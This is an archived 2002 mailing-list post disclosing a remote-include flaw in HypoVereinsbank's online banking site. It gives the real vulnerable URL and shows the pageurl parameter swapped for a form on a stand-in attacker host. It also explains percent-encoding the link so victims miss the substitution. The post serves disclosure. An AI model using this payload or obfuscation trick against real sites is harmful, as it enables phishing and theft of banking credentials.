security issue at hypovereins bank

From: hnz geeratz[room23] (staff@room23.org)
Date: Fri Apr 05 2002 - 05:12:49 EST


hello

I found this security issue on the german hypovereins bank.
They are informed vor 3 months ago , still there is nothing changed.
The security hole will allow a atacker to include his own forms in the
website. This will give him an option to collect sensible information.
It is a home bankin system!

take a look at this (long) URL:
http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu

now it is possible to change the
pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
part to something like pageurl=http://www.evol.org/fake_form.php

ore try :
http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de

so it is possible to include everything in this webpage.
The attacker could obscure the url in a form like:
pageurl=h%74t%70%3A%2Fw%77w%77............
so the user will not notice that the include form is not from the original
server

It opens a port to a new form of social hacking and data grabbing.

greetings hnz g

-- 
hnz geeratz | staff@room23.org


This archive was generated by hypermail 2.1.7 : Wed Apr 09 2008 - 22:28:02 EDT